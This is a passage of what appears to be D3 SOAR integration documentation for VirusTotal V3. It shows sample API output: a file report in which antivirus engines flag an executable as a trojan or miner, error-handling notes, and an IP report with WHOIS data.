2217.9609375, 'size': 204, 'entropy': 5.1748833656311035, 'md5': '*****'}}, 'tables_present': 12, 'clr_version': 'v4.0.30319', 'assembly_data': {'majorversion': 0, 'minorversion': 0, 'hashalgid': 32772, 'flags_text': 'afPA_None', 'buildnumber': 0, 'flags': 0, 'revisionnumber': 0, 'name': 'mine'}, 'tables_present_map': '90908021447L', 'clr_meta_version': '1.1'}, 'pe_info': {'resource_details': [{'lang': 'NEUTRAL', 'entropy': 3.1186211109161377, 'chi2': 49802.72265625, 'filetype': 'Data', 'sha256': '*****', 'type': 'RT_VERSION'}, {'lang': 'NEUTRAL', 'entropy': 5.00111722946167, 'chi2': 4719.86083984375, 'filetype': 'Data', 'sha256': '*****', 'type': 'RT_MANIFEST'}], 'resource_types': {'RT_MANIFEST': 1, 'RT_VERSION': 1}, 'timestamp': 1625642073, 'resource_langs': {'NEUTRAL': 2}, 'machine_type': 34404, 'sections': [{'name': '.text', 'chi2': 197889.53, 'virtual_address': 8192, 'entropy': 7.42, 'raw_size': 47616, 'flags': 'rx', 'virtual_size': 47536, 'md5': '*****'}, {'name': '.rsrc', 'chi2': 102753.17, 'virtual_address': 57344, 'entropy': 3.67, 'raw_size': 1536, 'flags': 'r', 'virtual_size': 1232, 'md5': '*****'}]}, 'magic': 'PE32+ executable for MS Windows (GUI)', 'last_analysis_stats': {'harmless': 0, 'type-unsupported': 5, 'suspicious': 0, 'confirmed-timeout': 1, 'timeout': 0, 'failure': 0, 'malicious': 22, 'undetected': 47}, 'last_analysis_results': {'Bkav': {'category': 'undetected', 'engine_name': 'Bkav', 'engine_version': '1.3.0.9899', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'Lionic': {'category': 'undetected', 'engine_name': 'Lionic', 'engine_version': '4.2', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'Elastic': {'category': 'malicious', 'engine_name': 'Elastic', 'engine_version': '4.0.25', 'result': 'malicious (high confidence)', 'method': 'blacklist', 'engine_update': '20210706'}, 'MicroWorld-eScan': {'category': 'undetected', 'engine_name': 'MicroWorld-eScan', 'engine_version': '14.0.409.0', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'FireEye': {'category': 'malicious', 'engine_name': 'FireEye', 'engine_version': '32.44.1.0', 'result': 'Generic.mg.3e9fc2e8c10879eb', 'method': 'blacklist', 'engine_update': '20210708'}, 'CAT-QuickHeal': {'category': 'undetected', 'engine_name': 'CAT-QuickHeal', 'engine_version': '14.00', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'ALYac': {'category': 'undetected', 'engine_name': 'ALYac', 'engine_version': '1.1.3.1', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'Cylance': {'category': 'malicious', 'engine_name': 'Cylance', 'engine_version': '2.3.1.101', 'result': 'Unsafe', 'method': 'blacklist', 'engine_update': '20210709'}, 'VIPRE': {'category': 'undetected', 'engine_name': 'VIPRE', 'engine_version': '93864', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'Sangfor': {'category': 'undetected', 'engine_name': 'Sangfor', 'engine_version': '2.9.0.0', 'result': None, 'method': 'blacklist', 'engine_update': '20210625'}, 'K7AntiVirus': {'category': 'undetected', 'engine_name': 'K7AntiVirus', 'engine_version': '11.192.37672', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'Alibaba': {'category': 'malicious', 'engine_name': 'Alibaba', 'engine_version': '0.3.0.5', 'result': 'Trojan:MSIL/Kryptik.e53a90cd', 'method': 'blacklist', 'engine_update': '20190527'}, 'K7GW': {'category': 'undetected', 'engine_name': 'K7GW', 'engine_version': '11.192.37673', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'Cybereason': {'category': 'malicious', 'engine_name': 'Cybereason', 'engine_version': '1.2.449', 'result': 'malicious.96f4c1', 'method': 'blacklist', 'engine_update': '20210330'}, 'Baidu': {'category': 'undetected', 'engine_name': 'Baidu', 'engine_version': '1.0.0.2', 'result': None, 'method': 'blacklist', 'engine_update': '20190318'}, 'Cyren': {'category': 'malicious', 'engine_name': 'Cyren', 'engine_version': '6.3.0.2', 'result': 'W64/Kryptik.EOA.gen!Eldorado', 'method': 'blacklist', 'engine_update': '20210708'}, 'SymantecMobileInsight': {'category': 'type-unsupported', 'engine_name': 'SymantecMobileInsight', 'engine_version': '2.0', 'result': None, 'method': 'blacklist', 'engine_update': '20210126'}, 'Symantec': {'category': 'malicious', 'engine_name': 'Symantec', 'engine_version': '1.15.0.0', 'result': 'Trojan.Gen.2', 'method': 'blacklist', 'engine_update': '20210708'}, 'ESET-NOD32': {'category': 'malicious', 'engine_name': 'ESET-NOD32', 'engine_version': '23594', 'result': 'a variant of MSIL/Kryptik.ABVL', 'method': 'blacklist', 'engine_update': '20210708'}, 'APEX': {'category': 'undetected', 'engine_name': 'APEX', 'engine_version': '6.182', 'result': None, 'method': 'blacklist', 'engine_update': '20210707'}, 'Paloalto': {'category': 'malicious', 'engine_name': 'Paloalto', 'engine_version': '1.0', 'result': 'generic.ml', 'method': 'blacklist', 'engine_update': '20210709'}, 'ClamAV': {'category': 'undetected', 'engine_name': 'ClamAV', 'engine_version': '0.103.3.0', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'Kaspersky': {'category': 'malicious', 'engine_name': 'Kaspersky', 'engine_version': '21.0.1.45', 'result': 'HEUR:Trojan.MSIL.CoinMiner.gen', 'method': 'blacklist', 'engine_update': '20210708'}, 'BitDefender': {'category': 'undetected', 'engine_name': 'BitDefender', 'engine_version': '7.2', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'NANO-Antivirus': {'category': 'undetected', 'engine_name': 'NANO-Antivirus', 'engine_version': '1.0.146.25311', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'SUPERAntiSpyware': {'category': 'undetected', 'engine_name': 'SUPERAntiSpyware', 'engine_version': '5.6.0.1032', 'result': None, 'method': 'blacklist', 'engine_update': '20210703'}, 'Avast': {'category': 'malicious', 'engine_name': 'Avast', 'engine_version': '21.1.5827.0', 'result': 'FileRepMalware', 'method': 'blacklist', 'engine_update': '20210708'}, 'Tencent': {'category': 'undetected', 'engine_name': 'Tencent', 'engine_version': '1.0.0.1', 'result': None, 'method': 'blacklist', 'engine_update': '20210709'}, 'Ad-Aware': {'category': 'undetected', 'engine_name': 'Ad-Aware', 'engine_version': '3.0.21.179', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'Trustlook': {'category': 'type-unsupported', 'engine_name': 'Trustlook', 'engine_version': '1.0', 'result': None, 'method': 'blacklist', 'engine_update': '20210709'}, 'TACHYON': {'category': 'undetected', 'engine_name': 'TACHYON', 'engine_version': '2021-07-08.02', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'Sophos': {'category': 'malicious', 'engine_name': 'Sophos', 'engine_version': '1.3.0.0', 'result': 'Mal/Generic-S', 'method': 'blacklist', 'engine_update': '20210708'}, 'Comodo': {'category': 'undetected', 'engine_name': 'Comodo', 'engine_version': '33693', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'F-Secure': {'category': 'undetected', 'engine_name': 'F-Secure', 'engine_version': '12.0.86.52', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'DrWeb': {'category': 'undetected', 'engine_name': 'DrWeb', 'engine_version': '7.0.49.9080', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'Zillya': {'category': 'undetected', 'engine_name': 'Zillya', 'engine_version': '2.0.0.4404', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'TrendMicro': {'category': 'undetected', 'engine_name': 'TrendMicro', 'engine_version': '11.0.0.1006', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'McAfee-GW-Edition': {'category': 'malicious', 'engine_name': 'McAfee-GW-Edition', 'engine_version': 'v2019.1.2+3728', 'result': 'BehavesLike.Win64.Trojan.pc', 'method': 'blacklist', 'engine_update': '20210708'}, 'Trapmine': {'category': 'type-unsupported', 'engine_name': 'Trapmine', 'engine_version': '3.5.0.1023', 'result': None, 'method': 'blacklist', 'engine_update': '20200727'}, 'CMC': {'category': 'undetected', 'engine_name': 'CMC', 'engine_version': '2.10.2019.1', 'result': None, 'method': 'blacklist', 'engine_update': '20210624'}, 'Emsisoft': {'category': 'undetected', 'engine_name': 'Emsisoft', 'engine_version': '2018.12.0.1641', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'Ikarus': {'category': 'undetected', 'engine_name': 'Ikarus', 'engine_version': '0.1.5.2', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'GData': {'category': 'undetected', 'engine_name': 'GData', 'engine_version': 'A:25.30217B:27.23648', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'Jiangmin': {'category': 'undetected', 'engine_name': 'Jiangmin', 'engine_version': '16.0.100', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'Webroot': {'category': 'undetected', 'engine_name': 'Webroot', 'engine_version': '1.0.0.403', 'result': None, 'method': 'blacklist', 'engine_update': '20210709'}, 'Avira': {'category': 'undetected', 'engine_name': 'Avira', 'engine_version': '8.3.3.12', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'eGambit': {'category': 'confirmed-timeout', 'engine_name': 'eGambit', 'engine_version': None, 'result': None, 'method': 'blacklist', 'engine_update': '20210709'}, 'Antiy-AVL': {'category': 'undetected', 'engine_name': 'Antiy-AVL', 'engine_version': '3.0.0.1', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'Kingsoft': {'category': 'undetected', 'engine_name': 'Kingsoft', 'engine_version': '2017.9.26.565', 'result': None, 'method': 'blacklist', 'engine_update': '20210709'}, 'Gridinsoft': {'category': 'undetected', 'engine_name': 'Gridinsoft', 'engine_version': '1.0.47.140', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'Arcabit': {'category': 'undetected', 'engine_name': 'Arcabit', 'engine_version': '1.0.0.886', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'ViRobot': {'category': 'undetected', 'engine_name': 'ViRobot', 'engine_version': '2014.3.20.0', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'ZoneAlarm': {'category': 'undetected', 'engine_name': 'ZoneAlarm', 'engine_version': '1.0', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'Avast-Mobile': {'category': 'type-unsupported', 'engine_name': 'Avast-Mobile', 'engine_version': '210708-04', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'Microsoft': {'category': 'malicious', 'engine_name': 'Microsoft', 'engine_version': '1.1.18300.4', 'result': 'Program:Win32/Wacapew.C!ml', 'method': 'blacklist', 'engine_update': '20210708'}, 'Cynet': {'category': 'malicious', 'engine_name': 'Cynet', 'engine_version': '4.0.0.27', 'result': 'Malicious (score: 100)', 'method': 'blacklist', 'engine_update': '20210708'}, 'BitDefenderFalx': {'category': 'type-unsupported', 'engine_name': 'BitDefenderFalx', 'engine_version': '2.0.936', 'result': None, 'method': 'blacklist', 'engine_update': '20210610'}, 'AhnLab-V3': {'category': 'undetected', 'engine_name': 'AhnLab-V3', 'engine_version': '3.20.3.10145', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'Acronis': {'category': 'undetected', 'engine_name': 'Acronis', 'engine_version': '1.1.1.82', 'result': None, 'method': 'blacklist', 'engine_update': '20210512'}, 'McAfee': {'category': 'malicious', 'engine_name': 'McAfee', 'engine_version': '6.0.6.653', 'result': 'Artemis!3E9FC2E8C108', 'method': 'blacklist', 'engine_update': '20210708'}, 'MAX': {'category': 'undetected', 'engine_name': 'MAX', 'engine_version': '2019.9.16.1', 'result': None, 'method': 'blacklist', 'engine_update': '20210709'}, 'VBA32': {'category': 'undetected', 'engine_name': 'VBA32', 'engine_version': '5.0.0', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'Malwarebytes': {'category': 'undetected', 'engine_name': 'Malwarebytes', 'engine_version': '4.2.2.27', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'Zoner': {'category': 'undetected', 'engine_name': 'Zoner', 'engine_version': '0.0.0.0', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'TrendMicro-HouseCall': {'category': 'undetected', 'engine_name': 'TrendMicro-HouseCall', 'engine_version': '10.0.0.1040', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'Rising': {'category': 'undetected', 'engine_name': 'Rising', 'engine_version': '25.0.0.26', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'Yandex': {'category': 'undetected', 'engine_name': 'Yandex', 'engine_version': '5.5.2.24', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'SentinelOne': {'category': 'malicious', 'engine_name': 'SentinelOne', 'engine_version': '5.2.0.9', 'result': 'Static AI - Malicious PE', 'method': 'blacklist', 'engine_update': '20210703'}, 'MaxSecure': {'category': 'malicious', 'engine_name': 'MaxSecure', 'engine_version': '1.0.0.1', 'result': 'Trojan.Malware.300983.susgen', 'method': 'blacklist', 'engine_update': '20210708'}, 'Fortinet': {'category': 'malicious', 'engine_name': 'Fortinet', 'engine_version': '6.2.142.0', 'result': 'MSIL/GenKryptik.FFBT!tr', 'method': 'blacklist', 'engine_update': '20210708'}, 'BitDefenderTheta': {'category': 'undetected', 'engine_name': 'BitDefenderTheta', 'engine_version': '7.2.37796.0', 'result': None, 'method': 'blacklist', 'engine_update': '20210702'}, 'AVG': {'category': 'malicious', 'engine_name': 'AVG', 'engine_version': '21.1.5827.0', 'result': 'FileRepMalware', 'method': 'blacklist', 'engine_update': '20210708'}, 'Panda': {'category': 'undetected', 'engine_name': 'Panda', 'engine_version': '4.6.4.2', 'result': None, 'method': 'blacklist', 'engine_update': '20210708'}, 'CrowdStrike': {'category': 'malicious', 'engine_name': 'CrowdStrike', 'engine_version': '1.0', 'result': 'win/malicious_confidence_80% (W)', 'method': 'blacklist', 'engine_update': '20210203'}, 'Qihoo-360': {'category': 'malicious', 'engine_name': 'Qihoo-360', 'engine_version': '1.0.0.1300', 'result': 'Win64/Miner.Coinminer.HgEASYAA', 'method': 'blacklist', 'engine_update': '20210709'}}, 'reputation': 0}, 'type': 'file', 'id': '*****', 'links': {'self': 'https://www.virustotal.com/api/v3/files/*****'}}, {'attributes': {'type_description': 'Win32 EXE', 'tlsh': 'T114A533253B596C08FA7D65B8EB736728E6620FD2A855C6451D103C693C3FB863F38788', 'vhash': '026026751"z', 'trid': [{'file_type': 'Win64 Executable (generic)', 'probability': 63.5}, {'file_type': 'OS/2 Executable (generic)', 'probability': 12.2}, {'file_type': 'Generic Win/DOS Executable', 'probability': 12.0}, {'file_type': 'DOS Executable Generic', 'probability': 12.0}], 'signature_info': {'product': 'PubgBlues', 'description': 'PubgBlues.exe', 'copyright': 'Copyright 2021 PubgBlues', 'original name': 'PubgBlues.exe', 'comments': 'PubgBlues', 'file version': '70.0.3538.110', 'internal name': 'PubgBlues.exe'}, 'creation_date': 1625746652, 'names': ['pubgblues.exe', 'PubgBlues.exe'], 'dot_net_guids': {'typelib_id': 'ad9de3ff-f96d-45bd-a5b6-9c5c8bbd63b8', 'mvid': 'b9619817-2348-412a-bccd-7098b630d3a5'}, 'last_modification_date': 1625856014, 'type_tag': 'peexe', 'times_submitted': 1, 'total_votes': {'harmless': 0, 'malicious': 0}, 'size': 2218496, 'popular_threat_classification': {'suggested_threat_label': 'trojan.bulz/msil', 'popular_threat_category': [{'count': 5, 'value': 'trojan'}, {'count': 3, 'value': 'miner'}], 'popular_threat_name': [{'count': 8, 'value': 'bulz'}, {'count': 3, 'value': 'msil'}, {'count': 2, 'value': 'kryptik'}]}, 'authentihash': '0ab4d00f10443fd0b063e0f0b0feae546200632a733032c9b633320469d4ee13', 'last_submission_date': 1625842709, 'meaningful_name': 'PubgBlues.exe', 'crowdsourced_ids_stats': {'in |
Error Handling
If the Return Data is Partially Successful or Failed, an Error tab will appear in the Test Result window.
The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.
Parts in Error | Description | Example |
Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Get IP Relationships failed. |
Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the VirusTotal V3 portal. Refer to the VirusTotal API Errors for details. | Status Code: 400. |
Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Invalid IP. |
Error Sample Data Get IP Relationships failed. Status Code: 400. Message: Invalid IP. |
Get IP Reports
Retrieves information on the specified IP addresses.
Input
Input Parameter | Required/Optional | Description | Example |
IPs | Required | The list of IPs to return corresponding report information. | ["***.***.***.***"] |
Output
The primary response data from the API request.
SAMPLE DATA
[
{
"data": {
"attributes": {
"regional_internet_registry": "RIPE NCC",
"network": "***.***.***.***/**",
"tags": [],
"country": "DE",
"as_owner": "M247 Ltd",
"last_analysis_stats": {
"harmless": 71,
"malicious": 6,
"suspicious": 0,
"undetected": 8,
"timeout": 0
},
"asn": 9009,
"whois_date": 1619276931,
"last_analysis_results": {
"CMC Threat Intelligence": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CMC Threat Intelligence"
},
"DNS8": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "DNS8"
},
"Lionic": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Lionic"
},
"Snort IP sample list": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Snort IP sample list"
},
"AICC (MONITORAPP)": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AICC (MONITORAPP)"
},
"benkow.cc": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "benkow.cc"
},
"VX Vault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "VX Vault"
},
"securolytics": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "securolytics"
},
"MalwarePatrol": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwarePatrol"
},
"Armis": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Armis"
},
"MalBeacon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalBeacon"
},
"Comodo Valkyrie Verdict": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Comodo Valkyrie Verdict"
},
"PhishLabs": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "PhishLabs"
},
"EmergingThreats": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EmergingThreats"
},
"zvelo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "zvelo"
},
"K7AntiVirus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "K7AntiVirus"
},
"Nucleon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Nucleon"
},
"Virusdie External Site Scan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Virusdie External Site Scan"
},
"CINS Army": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CINS Army"
},
"Spamhaus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Spamhaus"
},
"Quttera": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quttera"
},
"Yandex Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Yandex Safebrowsing"
},
"SafeToOpen": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "SafeToOpen"
},
"MalwareDomainList": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwareDomainList"
},
"CyberCrime": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CyberCrime"
},
"Lumu": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Lumu"
},
"Google Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Google Safebrowsing"
},
"FraudScore": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "FraudScore"
},
"Kaspersky": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Kaspersky"
},
"BitDefender": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BitDefender"
},
"Emsisoft": {
"category": "malicious",
"result": "phishing",
"method": "blacklist",
"engine_name": "Emsisoft"
},
"GreenSnow": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "GreenSnow"
},
"G-Data": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "G-Data"
},
"Segasec": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Segasec"
},
"OpenPhish": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "OpenPhish"
},
"Sucuri SiteCheck": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sucuri SiteCheck"
},
"AutoShun": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "AutoShun"
},
"Trustwave": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Trustwave"
},
"Web Security Guard": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Web Security Guard"
},
"CyRadar": {
"category": "malicious",
"result": "malicious",
"method": "blacklist",
"engine_name": "CyRadar"
},
"desenmascara.me": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "desenmascara.me"
},
"ADMINUSLabs": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ADMINUSLabs"
},
"Scantitan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Scantitan"
},
"IPsum": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "IPsum"
},
"Dr.Web": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Dr.Web"
},
"AlienVault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AlienVault"
},
"Sophos": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sophos"
},
"malwares.com URL checker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "malwares.com URL checker"
},
"Abusix": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Abusix"
},
"Phishtank": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishtank"
},
"EonScope": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EonScope"
},
"Malwared": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Malwared"
},
"Avira": {
"category": "malicious",
"result": "phishing",
"method": "blacklist",
"engine_name": "Avira"
},
"NotMining": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "NotMining"
},
"Cyan": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Cyan"
},
"Antiy-AVL": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Antiy-AVL"
},
"SCUMWARE.org": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SCUMWARE.org"
},
"Spam404": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Spam404"
},
"MalSilo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalSilo"
},
"ESTsecurity-Threat Inside": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ESTsecurity-Threat Inside"
},
"Certego": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Certego"
},
"ESET": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ESET"
},
"Threatsourcing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Threatsourcing"
},
"URLhaus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "URLhaus"
},
"SecureBrain": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SecureBrain"
},
"Webroot": {
"category": "malicious",
"result": "malicious",
"method": "blacklist",
"engine_name": "Webroot"
},
"PREBYTES": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "PREBYTES"
},
"StopForumSpam": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "StopForumSpam"
},
"Blueliv": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Blueliv"
},
"Hoplite Industries": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Hoplite Industries"
},
"Netcraft": {
"category": "malicious",
"result": "malicious",
"method": "blacklist",
"engine_name": "Netcraft"
},
"CRDF": {
"category": "malicious",
"result": "malicious",
"method": "blacklist",
"engine_name": "CRDF"
},
"ThreatHive": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ThreatHive"
},
"BADWARE.INFO": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BADWARE.INFO"
},
"Forcepoint ThreatSeeker": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Forcepoint ThreatSeeker"
},
"Quick Heal": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quick Heal"
},
"Tencent": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Tencent"
},
"StopBadware": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "StopBadware"
},
"Fortinet": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Fortinet"
},
"Bfore.Ai PreCrime": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Bfore.Ai PreCrime"
},
"ZeroCERT": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ZeroCERT"
},
"Baidu-International": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Baidu-International"
},
"Phishing Database": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishing Database"
},
"alphaMountain.ai": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "alphaMountain.ai"
}
},
"reputation": 0,
"last_modification_date": 1624460268,
"total_votes": {
"harmless": 0,
"malicious": 0
},
"continent": "EU",
"whois": "NetRange: ***.***.***.*** - ***.***.***.***\nCIDR: ***.***.***.***\nNetName: RIPE-37\nNetHandle: NET-37-0-0-0-1\nParent: ()\nNetType: Allocated to RIPE NCC\nOriginAS: \nOrganization: RIPE Network Coordination Centre (RIPE)\nRegDate: 2010-11-30\nUpdated: 2011-01-17\nComment: These addresses have been further assigned to users in\nComment: the RIPE NCC region. Contact information can be found in\nComment: the RIPE database at http://www.ripe.net/whois\nRef: https://rdap.arin.net/registry/ip/***.***.***.***\nResourceLink: https://apps.db.ripe.net/search/query.html\nResourceLink: whois.ripe.net\nOrgName: RIPE Network Coordination Centre\nOrgId: RIPE\nAddress: P.O. Box 10096\nCity: Amsterdam\nStateProv: \nPostalCode: 1001EB\nCountry: NL\nRegDate: \nUpdated: 2013-07-29\nRef: https://rdap.arin.net/registry/entity/RIPE\nReferralServer: whois://whois.ripe.net\nResourceLink: https://apps.db.ripe.net/search/query.html\nOrgAbuseHandle: ABUSE3850-ARIN\nOrgAbuseName: Abuse Contact\nOrgAbusePhone: +31205354444 \nOrgAbuseEmail: abuse@ripe.net\nOrgAbuseRef: https://rdap.arin.net/registry/entity/ABUSE3850-ARIN\nOrgTechHandle: RNO29-ARIN\nOrgTechName: RIPE NCC Operations\nOrgTechPhone: +31 20 535 4444 \nOrgTechEmail: hostmaster@ripe.net\nOrgTechRef: https://rdap.arin.net/registry/entity/RNO29-ARIN\ninetnum: ***.***.***.*** - ***.***.***.***\nnetname: M247-LTD-Frankfurt\ndescr: M247 LTD Frankfurt Infrastructure\ncountry: DE\ngeoloc: 50.0658 8.6165\nadmin-c: GBXS1-RIPE\ntech-c: GBXS1-RIPE\nstatus: ASSIGNED PA\nmnt-by: SDAT-MNT\nmnt-routes: GLOBALAXS-MNT\nmnt-domains: GLOBALAXS-MNT\nremarks: --------------LEGAL CONCERNS-----------------------------\nremarks: For any legal requests, please send an email\nremarks: to *****@*****.*** for a maximum 48hours response.\nremarks: ---------------------------------------------------------\ncreated: 2019-07-16T12:54:17Z\nlast-modified: 2019-07-16T12:54:17Z\nsource: RIPE\nrole: GLOBALAXS DE NOC\naddress: Hanauer Landstra?e 302, Hessen\naddress: 60314, Frankfurt, Germany\nabuse-mailbox: abuse@m247.ro\nnic-hdl: GBXS1-RIPE\nmnt-by: GLOBALAXS-MNT\ncreated: 2016-03-10T13:28:16Z\nlast-modified: 2018-07-20T12:25:46Z\nsource: RIPE # Filtered\nroute: ***.***.***.***/**\norigin: AS9009\nmnt-by: GLOBALAXS-MNT\ncreated: 2019-07-17T08:24:38Z\nlast-modified: 2019-07-17T08:24:38Z\nsource: RIPE\n"
},
"type": "ip_address",
"id": "***.***.***.***",
"links": {
"self": "https://www.virustotal.com/api/v3/ip_addresses/***.***.***.***"
}
}
}
]The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.
It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.
SAMPLE DATA
[
{
"data": {
"attributes": {
"regional_internet_registry": "RIPE NCC",
"network": "***.***.***.***/**",
"tags": [],
"country": "DE",
"as_owner": "M247 Ltd",
"last_analysis_stats": {
"harmless": 71,
"malicious": 6,
"suspicious": 0,
